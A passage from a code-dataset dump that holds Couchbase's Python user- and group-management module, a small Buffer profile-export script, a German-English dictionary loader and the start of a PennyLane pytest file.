management_operation(**mgmt_kwargs)\n\n def upsert_user(self,\n user, # type: User\n *options, # type: UpsertUserOptions\n **kwargs # type: Any\n ) -> None:\n\n final_args = forward_args(kwargs, *options)\n domain = final_args.pop(\"domain_name\", \"local\")\n domain = self._get_valid_domain(domain)\n\n if not user.groups and (not user.roles or not isinstance(user.roles, set)):\n raise InvalidArgumentException(\"Roles must be a non-empty list\")\n\n user_dict = {k: v for k, v in user.as_dict().items() if k in {\n \"password\", \"name\", \"username\", \"groups\"}}\n\n if user_dict[\"password\"] and domain == \"external\":\n raise InvalidArgumentException(\n \"External domains must not have passwords\")\n\n if user.roles:\n user_dict[\"roles\"] = list(map(lambda r: r.as_dict(), user.roles))\n\n op_args = {\n \"domain\": domain,\n \"user\": user_dict\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.UPSERT_USER.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def drop_user(self,\n username, # type: str\n *options, # type: DropUserOptions\n **kwargs # type: Any\n ) -> None:\n\n final_args = forward_args(kwargs, *options)\n domain = final_args.pop(\"domain_name\", \"local\")\n domain = self._get_valid_domain(domain)\n\n op_args = {\n \"domain\": domain,\n \"username\": username\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.DROP_USER.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def change_password(self,\n new_password, # type: str\n *options, # type: ChangePasswordOptions\n **kwargs # type: Any\n ) -> None:\n\n final_args = forward_args(kwargs, *options)\n\n op_args = {\n \"password\": new_password\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.CHANGE_PASSWORD.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def get_roles(self,\n *options, # type: GetRolesOptions\n **kwargs # type: Any\n ) -> Optional[Iterable[RoleAndDescription]]:\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.GET_ROLES.value\n }\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n final_args = forward_args(kwargs, *options)\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def get_group(self,\n group_name, # type: str\n *options, # type: GetGroupOptions\n **kwargs # type: Any\n ) -> Optional[Group]:\n\n op_args = {\n \"name\": group_name\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.GET_GROUP.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n final_args = forward_args(kwargs, *options)\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def get_all_groups(self,\n *options, # type: GetAllGroupsOptions\n **kwargs # type: Any\n ) -> Optional[Iterable[Group]]:\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.GET_ALL_GROUPS.value\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n final_args = forward_args(kwargs, *options)\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def upsert_group(self,\n group, # type: Group\n *options, # type: UpsertGroupOptions\n **kwargs # type: Any\n ) -> None:\n\n group_dict = {k: v for k, v in group.as_dict().items() if k in {\n \"name\", \"description\", \"ldap_group_reference\"}}\n\n if group.roles:\n group_dict[\"roles\"] = list(map(lambda r: r.as_dict(), group.roles))\n\n op_args = {\n \"group\": group_dict\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.UPSERT_GROUP.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n final_args = forward_args(kwargs, *options)\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def drop_group(self,\n group_name, # type: str\n *options, # type: DropGroupOptions\n **kwargs # type: Any\n ) -> None:\n\n op_args = {\n \"name\": group_name\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.DROP_GROUP.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n final_args = forward_args(kwargs, *options)\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n\nclass UserManagementUtils(object):\n \"\"\"\n ** INTERNAL **\n \"\"\"\n\n @classmethod\n def to_set(cls, value, valid_type, display_name):\n\n if not value:\n return value\n elif isinstance(value, set):\n cls.validate_all_set_types(value, valid_type, display_name)\n return value\n elif isinstance(value, list):\n cls.validate_all_set_types(value, valid_type, display_name)\n return set(value)\n elif isinstance(value, tuple):\n cls.validate_all_set_types(value, valid_type, display_name)\n return set(value)\n elif isinstance(value, valid_type):\n return set([value])\n else:\n raise InvalidArgumentException(\n '{} must be of type {}.'.format(display_name,\n valid_type.__name__))\n\n @classmethod\n def validate_all_set_types(cls, value, valid_type, display_name):\n\n if all(map(lambda r: isinstance(r, type), value)):\n raise InvalidArgumentException(\n '{} must contain only objects of type {}.'.format(display_name,\n valid_type.__name__))\n\n\nclass Role:\n\n def __init__(self,\n name=None, # type: str\n bucket=None, # type: str\n scope=None, # type: str\n collection=None, # type: str\n ):\n\n if not name:\n raise InvalidArgumentException('A role must have a name')\n\n self._name = name\n self._bucket = bucket\n self._scope = scope\n self._collection = collection\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def bucket(self) -> str:\n return self._bucket\n\n @property\n def scope(self) -> str:\n return self._scope\n\n @property\n def collection(self) -> str:\n return self._collection\n\n def as_dict(self):\n return {\n 'name': self._name,\n 'bucket': self._bucket,\n 'scope': self._scope,\n 'collection': self._collection\n }\n\n def __eq__(self, other):\n if not isinstance(other, Role):\n return False\n return (self.name == other.name\n and self.bucket == other.bucket\n and self.scope == other.scope\n and self.collection == other.collection)\n\n def __hash__(self):\n return hash((self.name, self.bucket, self.scope, self.collection))\n\n @classmethod\n def create_role(cls, raw_data):\n return cls(\n name=raw_data.get(\"name\", None),\n bucket=raw_data.get(\"bucket_name\", None),\n scope=raw_data.get(\"scope_name\", None),\n collection=raw_data.get(\"collection_name\", None)\n )\n\n\nclass RoleAndDescription:\n\n def __init__(self,\n role=None, # type: Role\n display_name=None, # type: str\n description=None, # type: str\n ce=None, # type: bool\n ):\n\n self._role = role\n self._display_name = display_name\n self._description = description\n self._ce = ce\n\n @property\n def role(self) -> Role:\n return self._role\n\n @property\n def display_name(self) -> str:\n return self._display_name\n\n @property\n def description(self) -> str:\n return self._description\n\n @property\n def ce(self) -> bool:\n return self._ce\n\n @classmethod\n def create_role_and_description(cls, raw_data):\n return cls(\n role=Role.create_role(raw_data),\n display_name=raw_data.get('display_name', None),\n description=raw_data.get('description', None),\n ce=raw_data.get('ce', None)\n )\n\n\nclass Origin:\n \"\"\"\n Indicates why the user has a specific role.\n If the type is \"user\" it means the role is assigned\n directly to the user. If the type is \"group\" it means\n the role is inherited from the group identified by\n the \"name\" field.\n \"\"\"\n\n def __init__(self,\n type=None, # type: str\n name=None # type: str\n ):\n\n self._type = type\n self._name = name\n\n @property\n def type(self) -> str:\n return self._type\n\n @property\n def name(self) -> str:\n return self._name\n\n\nclass RoleAndOrigins:\n\n def __init__(self,\n role=None, # type: Role\n origins=[] # type: List[Origin]\n ):\n\n self._role = role\n self._origins = origins\n\n @property\n def role(self) -> Role:\n return self._role\n\n @property\n def origins(self) -> List[Origin]:\n return self._origins\n\n @classmethod\n def create_role_and_origins(cls, raw_data):\n\n # RBAC prior to v6.5 does not have origins\n origin_data = raw_data.get(\"origins\", None)\n\n return cls(\n role=Role.create_role(raw_data.get(\"role\")),\n origins=list(map(lambda o: Origin(**o), origin_data))\n if origin_data else []\n )\n\n\nclass User:\n\n def __init__(self,\n username=None, # type: str\n display_name=None, # type: str\n groups=None, # type: Set[str]\n roles=None, # type: Set[Role]\n password=None # type: str\n ):\n\n if not username:\n raise InvalidArgumentException('A user must have a username')\n\n self._username = username\n self._display_name = display_name\n self._groups = UserManagementUtils.to_set(groups, str, 'Groups')\n self._roles = UserManagementUtils.to_set(roles, Role, 'Roles')\n self._password = password\n\n @property\n def username(self) -> str:\n return self._username\n\n @property\n def display_name(self) -> str:\n return self._display_name\n\n @display_name.setter\n def display_name(self,\n value # type: str\n ):\n self._display_name = value\n\n @property\n def groups(self) -> Set[str]:\n \"\"\"names of the groups\"\"\"\n return self._groups\n\n @groups.setter\n def groups(self,\n value # type: Set[str]\n ):\n self._groups = UserManagementUtils.to_set(value, str, 'Groups')\n\n @property\n def roles(self) -> Set[Role]:\n \"\"\"only roles assigned directly to the user (not inherited from groups)\"\"\"\n return self._roles\n\n @roles.setter\n def roles(self,\n value # type: Set[Role]\n ):\n self._roles = UserManagementUtils.to_set(value, Role, 'Roles')\n\n def password(self, value):\n self._password = value\n\n password = property(None, password)\n\n def as_dict(self):\n output = {\n \"username\": self.username,\n \"name\": self.display_name,\n \"password\": self._password\n }\n\n if self.roles:\n output[\"roles\"] = list(self.roles)\n\n if self.groups:\n output[\"groups\"] = list(self.groups)\n\n return output\n\n @classmethod\n def create_user(cls, raw_data, roles=None):\n\n user_roles = roles\n if not user_roles:\n set(map(lambda r: Role.create_role(r),\n raw_data.get(\"roles\")))\n\n # RBAC prior to v6.5 does not have groups\n group_data = raw_data.get(\"groups\", None)\n\n return cls(\n username=raw_data.get(\"username\"),\n display_name=raw_data.get(\"display_name\"),\n roles=user_roles,\n groups=set(group_data) if group_data else None\n )\n\n\nclass UserAndMetadata:\n \"\"\"\n Models the \"get user\" / \"get all users\" response.\n\n Associates the mutable properties of a user with\n derived properties such as the effective roles\n inherited from groups.\n \"\"\"\n\n def __init__(self,\n domain=None, # type: AuthDomain\n user=None, # type: User\n effective_roles=[], # type: List[RoleAndOrigins]\n password_changed=None, # type: datetime\n external_groups=None, # type: Set[str]\n **kwargs # type: Dict[str, Any]\n ):\n\n self._domain = domain\n self._user = user\n self._effective_roles = effective_roles\n self._password_changed = password_changed\n self._external_groups = external_groups\n self._raw_data = kwargs.get(\"raw_data\", None)\n\n @property\n def domain(self) -> AuthDomain:\n \"\"\" AuthDomain is an enumeration with values \"local\" and \"external\".\n It MAY alternatively be represented as String.\"\"\"\n return self._domain\n\n @property\n def user(self) -> User:\n \"\"\"returns a new mutable User object each time this method is called.\n Modifying the fields of the returned User MUST have no effect on the\n UserAndMetadata object it came from.\"\"\"\n return deepcopy(self._user)\n\n @property\n def effective_roles(self) -> List[RoleAndOrigins]:\n \"\"\"all roles, regardless of origin.\"\"\"\n return self._effective_roles\n\n @property\n def password_changed(self) -> Optional[datetime]:\n return self._password_changed\n\n @property\n def external_groups(self) -> Set[str]:\n return self._external_groups\n\n @property\n def raw_data(self) -> Dict[str, Any]:\n return self._raw_data\n\n @classmethod\n def create_user_and_metadata(cls, raw_data):\n\n effective_roles = list(map(lambda r: RoleAndOrigins.create_role_and_origins(r),\n raw_data.get(\"effective_roles\")))\n\n user_roles = set(r.role for r in effective_roles\n if any(map(lambda o: o.type == \"user\", r.origins)) or len(r.origins) == 0)\n\n # RBAC prior to v6.5 does not have groups\n ext_group_data = raw_data.get(\"external_groups\", None)\n\n # password_change_date is optional\n pw_data = raw_data.get(\"password_changed\", None)\n pw_changed = None\n formats = ['%Y-%m-%dT%H:%M:%S.%fZ', '%Y-%m-%dT%H:%M:%SZ']\n for f in formats:\n if pw_changed:\n break\n\n try:\n pw_changed = datetime.strptime(pw_data, f)\n except Exception: # nosec\n pass\n\n return cls(\n domain=AuthDomain.from_str(raw_data.get(\"domain\")),\n effective_roles=effective_roles,\n user=User.create_user(raw_data.get(\"user\"), roles=user_roles),\n password_changed=pw_changed,\n external_groups=set(ext_group_data) if ext_group_data else None,\n raw_data=raw_data\n )\n\n\nclass Group:\n def __init__(self,\n name=None, # type: str\n description=None, # type: str\n roles=None, # type: Set[Role]\n ldap_group_reference=None, # type: str\n **kwargs # type: Any\n ):\n\n if not name:\n raise InvalidArgumentException('A group must have a name')\n\n self._name = name\n self._description = description\n self._roles = UserManagementUtils.to_set(roles, Role, 'Roles')\n self._ldap_group_reference = ldap_group_reference\n self._raw_data = kwargs.get('raw_data', None)\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def description(self) -> str:\n return self._description\n\n @description.setter\n def description(self,\n value # type: str\n ):\n self._description = value\n\n @property\n def roles(self) -> Set[Role]:\n return self._roles\n\n @roles.setter\n def roles(self,\n value # type: Set[Role]\n ):\n self._roles = UserManagementUtils.to_set(value, Role, 'Roles')\n\n @property\n def ldap_group_reference(self) -> str:\n return self._ldap_group_reference\n\n @ldap_group_reference.setter\n def ldap_group_reference(self,\n value # type: str\n ):\n self._ldap_group_reference = value\n\n @property\n def raw_data(self) -> Dict[str, Any]:\n return self._raw_data\n\n def as_dict(self):\n rs = list(map(lambda r: r.as_dict(), self.roles))\n for r in self.roles:\n r.as_dict()\n return {\n 'name': self.name,\n 'description': self.description,\n 'roles': rs,\n 'ldap_group_reference': self.ldap_group_reference\n }\n\n @classmethod\n def create_group(cls, raw_data):\n return cls(\n raw_data.get('name'),\n description=raw_data.get('description', None),\n roles=set(map(lambda r: Role.create_role(\n r), raw_data.get('roles'))),\n ldap_group_referenc=raw_data.get('ldap_group_ref', None)\n )\n", "repo_name": "couchbase/couchbase-python-client", "sub_path": "couchbase/management/logic/users_logic.py", "file_name": "users_logic.py", "file_ext": "py", "file_size_in_byte": 26068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 239, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 25, "usage_type": "name"}, {"api_name": "couchbase.exceptions.GroupNotFoundException", "line_number": 40, "usage_type": "name"}, {"api_name": "couchbase.exceptions.UserNotFoundException", "line_number": 41, "usage_type": "name"}, {"api_name": "couchbase.exceptions.FeatureUnavailableException", "line_number": 42, "usage_type": "name"}, {"api_name": "couchbase.exceptions.FeatureUnavailableException", "line_number": 43, "usage_type": "name"}, {"api_name": "couchbase.exceptions.RateLimitedException", "line_number": 44, "usage_type": "name"}, {"api_name": "couchbase.auth.AuthDomain", "line_number": 54, "usage_type": "argument"}, {"api_name": "couchbase.auth.AuthDomain.to_str", "line_number": 55, "usage_type": "call"}, {"api_name": "couchbase.auth.AuthDomain", "line_number": 55, "usage_type": "name"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 57, "usage_type": "call"}, {"api_name": "couchbase.options.forward_args", "line_number": 65, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 77, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 77, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.GET_USER", "line_number": 78, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 78, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 93, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 63, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 99, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 109, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 109, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.GET_ALL_USERS", "line_number": 110, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 110, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 125, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 98, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 133, "usage_type": "call"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 138, "usage_type": "call"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 144, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 157, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 157, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.UPSERT_USER", "line_number": 158, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 158, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 173, "usage_type": "call"}, {"api_name": "couchbase.options.forward_args", "line_number": 181, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 192, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 192, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.DROP_USER", "line_number": 193, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 193, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 208, "usage_type": "call"}, {"api_name": "couchbase.options.forward_args", "line_number": 216, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 224, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 224, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.CHANGE_PASSWORD", "line_number": 225, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 225, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 240, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 249, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 249, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.GET_ROLES", "line_number": 250, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 250, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 260, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 264, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 245, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 245, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 278, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 278, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.GET_GROUP", "line_number": 279, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 279, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 291, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 295, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 270, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 304, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 304, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.GET_ALL_GROUPS", "line_number": 305, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 305, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 316, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 320, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 300, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 300, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 340, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 340, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.UPSERT_GROUP", "line_number": 341, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 341, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 353, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 357, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 371, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 371, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.DROP_GROUP", "line_number": 372, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 372, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 384, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 388, "usage_type": "call"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 413, "usage_type": "call"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 421, "usage_type": "call"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 436, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 569, "usage_type": "name"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 596, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 619, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 630, "usage_type": "name"}, {"api_name": "couchbase.auth.AuthDomain", "line_number": 705, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 715, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 718, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 723, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 723, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 727, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 731, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 731, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 755, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 755, "usage_type": "name"}, {"api_name": "couchbase.auth.AuthDomain.from_str", "line_number": 760, "usage_type": "call"}, {"api_name": "couchbase.auth.AuthDomain", "line_number": 760, "usage_type": "name"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 779, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 802, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 822, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 822, "usage_type": "name"}]} +{"seq_id": "9381833499", "text": "#!/usr/local/bin/python3\n\"\"\"\nThis will export the profile_ids to a csv_file.\nYou can export this CSV into your Alfred List Filter\n\"\"\"\n\nimport requests\nimport json\nimport csv\n\n# You will need to register your app to get this token https://buffer.com/developers/apps/create\ntoken = ''\n\nurl = f'https://api.bufferapp.com/1/profiles.json?access_token={token}'\nr = requests.get(url)\nprofiles = json.loads(r.text)\nwith open('profiles.csv', 'w', newline='') as csvfile:\n csvwriter = csv.writer(csvfile)\n for profile in profiles:\n csvwriter.writerow([profile['service_username'], profile['formatted_service'], profile['_id']])\n", "repo_name": "kjaymiller/alfred-buffer", "sub_path": "list_buffer_ids.py", "file_name": "list_buffer_ids.py", "file_ext": "py", "file_size_in_byte": 651, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "10135630857", "text": "import gzip\nimport magic\nimport re\n\nclass GermanToEnglishDictionary:\n \"\"\"\n Loads a german-to-english dictionary from Ding's dictionary file\n (https://www-user.tu-chemnitz.de/~fri/ding/).\n \"\"\"\n\n def __init__(self):\n self._german_words = {}\n\n def add_words_from_ding_definition(definition_text, word_dictionary):\n \"\"\" Add word definitions from a line in DING's text file. \"\"\"\n\n # Example line: \n #'Flugzeit {f} | Flugzeiten {pl} :: flying time | flying times'\n\n # Ignore comment lines.\n if re.match('\\s*#', definition_text):\n return \n\n # Divide line up into a list of words and a list of definitions.\n # Strip any whitespace.\n words, definitions = definition_text.split(\"::\")\n words = [word.strip() for word in words.split('|')]\n definitions = [definition.strip() for definition in \n definitions.split('|')]\n\n if len(words) != len(definitions):\n raise ValueError('Unequal number of words and definitions in line'\n 'for words: {}'.format(words))\n\n for i in range(len(words)):\n\n # Words may be split by semicolons.\n # Give them all the same definition.\n for word in words[i].split(';'):\n\n word = word.strip()\n\n word_parameters = re.match(\n\n # Get everyting up to a '{'\n # Word entries may include space, punctuation, or addemdums.\n '([^{]+)' \n\n # If there's a form, e.g. '{pl}' present, get it.\n '(?:{([^}]+)})?', \n\n word)\n\n if not word_parameters:\n raise ValueError('Unable to parse line with words: {}'\n .format(word))\n\n word_groups = word_parameters.groups()\n word_key = word_groups[0].strip()\n\n # If word has a form, put anything after it back on the word.\n if word_groups[1]:\n addendum = word[word_parameters.span()[1]:].strip()\n if addendum:\n word_key += ' ' + addendum\n\n word_entry = {\n 'word': word_key,\n 'definition': definitions[i],\n 'base_word_length': len(word_groups[0].strip())\n }\n\n if word_groups[1]:\n word_entry['form'] = word_groups[1]\n else:\n word_entry['form'] = None\n\n word_dictionary[word_key] = word_entry\n\n def read_from_ding_file(self, *, file_name):\n \"\"\"\n Read definitions from a dictionary in Ding's format.\n File may be a Gzip file or plain text.\n \"\"\"\n\n with magic.Magic(flags=magic.MAGIC_MIME_TYPE) as m:\n if m.id_filename(file_name) == 'application/gzip':\n dictionary_text = gzip.open(file_name, 'rt')\n else:\n dictionary_text = open(file_name, 'r')\n\n for definition_text in dictionary_text:\n GermanToEnglishDictionary.add_words_from_ding_definition(\n definition_text, self._german_words)\n\n def __iter__(self):\n \"\"\" Get an iterable of all words in the dictionary. \"\"\"\n\n def _word_generator(self):\n for key in self._german_words:\n yield self._german_words[key]\n return _word_generator(self)\n\n def __len__(self):\n \"\"\" Get the number of words in the dictionary. \"\"\"\n return len(self._german_words)\n\n def filter(self, *, key_substring):\n \"\"\" Get an iterable filter matching the given substring. \"\"\"\n\n for key in self._german_words:\n if key_substring in key:\n yield self._german_words[key]\n", "repo_name": "Jimm64/translate", "sub_path": "de_en/dictionary.py", "file_name": "dictionary.py", "file_ext": "py", "file_size_in_byte": 3824, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.match", "line_number": 21, "usage_type": "call"}, {"api_name": "re.match", "line_number": 43, "usage_type": "call"}, {"api_name": "magic.Magic", "line_number": 86, "usage_type": "call"}, {"api_name": "magic.MAGIC_MIME_TYPE", "line_number": 86, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "31504751362", "text": "import pytest\n\nfrom pennylane.data.attributes.json import DatasetJSON\n\npytestmark = pytest.mark.data\n\n\n@pytest.mark.parametrize(\n \"value\",\n [\"string\", 1, {\"one\": \"two\"}, None, [1, \"two\"]],\n)\nclass TestDatasetJSON:\n def test_value_init(self, value):\n \"\"\"Test that DatasetJSON is correctly value-initialized.\"\"\"\n dset_json = DatasetJSON(value)\n\n assert dset_json.get_value() == value\n\n def test_bind_init(self, value):\n \"\"\"Test that DatasetJSON is correctly bind-initialized.\"\"\"\n bind = DatasetJSON(value).bind\n\n assert 